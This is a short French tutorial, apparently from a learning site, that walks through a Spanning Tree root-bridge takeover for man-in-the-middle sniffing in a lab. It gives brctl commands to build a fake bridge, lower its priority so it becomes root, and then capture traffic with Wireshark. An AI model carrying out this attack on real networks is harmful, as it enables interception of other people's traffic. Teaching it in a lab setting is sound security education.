Steal Root Role MiTM

Pour réaliser cette attaque il nous faut une connexion à deux commutateur, mais pour les besoins du cours et par manque de matériel, j'ai réalisé cette attaque avec deux faux bridge uniquement, un censé représenter un bridge réel et l'autre le faux bridge monter par l'auditeur.

Configuration d'un faux bridge avec brctl (Disponible avec bridge-util)

Création:

brctl addbr nom_du_bridge

Ajout d'interfaces:

brctl addif nom_du_bridge eth0

brctl addif nom_du_bridge eth1

Activation de STP et du Bridge:

brctl stp nom_du_bridge on

ifconfig nom_du_bridge up

Réalisation de l'Attaque:

Dans la configuration actuel, notre Faux Bridge (ici hacker) a un BID de "ffff":

Nous pouvons voir que le "bridge cible" est Root avec un BID de "8000":

Maintenant nous modifions le BID de notre faux bridge et le passons à "0005":

brctl setbridgeprio hacker (nom_du_bridge) 5

Et nous devenons Root pour les autres commutateurs:

Nous pouvons maintenant lancer wireshark et commencer à écouter.

NCNT

NoCry-NoTeacher est un site de partage et d'apprentissage à tout ce qui attrait à l'informatique

Attaque sur le protocole Spanning Tree

Steal Root Role MiTM